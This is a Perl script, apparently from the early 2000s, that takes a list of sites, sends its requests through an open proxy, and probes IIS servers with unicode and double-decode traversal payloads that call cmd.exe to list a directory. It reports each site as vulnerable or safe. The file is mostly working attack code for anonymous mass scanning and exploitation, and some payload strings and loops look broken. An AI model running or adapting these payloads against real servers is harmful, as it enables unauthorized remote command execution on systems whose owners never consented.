#!/usr/bin/perl # # This program is based on the decodecheck written by Spidermark. # It scans (using an OPEN PROXY) a LIST of sites and ONLY probes # IIS servers (there's NO reason for checking APACHE and many others). # If the site is not running IIS, it tells you what server it is and # skeep to the next of the list (it saves a lot of time). # It checks for the decode and the old unicode vulnerabilities. # # Renato Turini - renatoturini@uol.com.br # # $|=1; @unis=( "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir", "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir", "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir", "/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir", "/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir", "/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir", "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir", "/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir", "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir", "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir", "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir", "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir", "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir", "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir", "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir"); use Socket; if ($#ARGV<2) {die "Usage: cool2 list proxy proxy_port\n";} $lista =$ARGV[0]; $proxy=@ARGV[1]; $port=@ARGV[2]; open (FILE, "$lista")|| die "Can't open file: $!"; while ($target = ) { chomp($target); print "Testing $target\n"; $bounce = inet_aton($proxy); $flag=0; my @iis=sendraw("GET http://$target/index HTTP/1.0\r\n\r\n"); foreach $line (@iis){ if ($line =~ /^Server/ && $line =~ /Microsoft-IIS/) { print "The site is running:\n"; print "$line"; print "let's check it out\n"; foreach $uni (@unis){ print "."; my @results=sendraw("GET http://$target$uni HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {print "Not safe:\n $uni\n"; $flag=1;} } } print "\n"; if ($flag==1){print "Vulnerable\n\n";} else {print "Safe\n\n";} } else { if ($line =~ /^Server/){ print "The site is running:\n"; print "$line"; print "skeeping...\n\n"; } } } } # Sendraw - thanx RFP rfp@wiretrip.net sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$bounce)){ my @in; select(S); $|=1; print $pstr; while(){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } }

亚洲欧美在线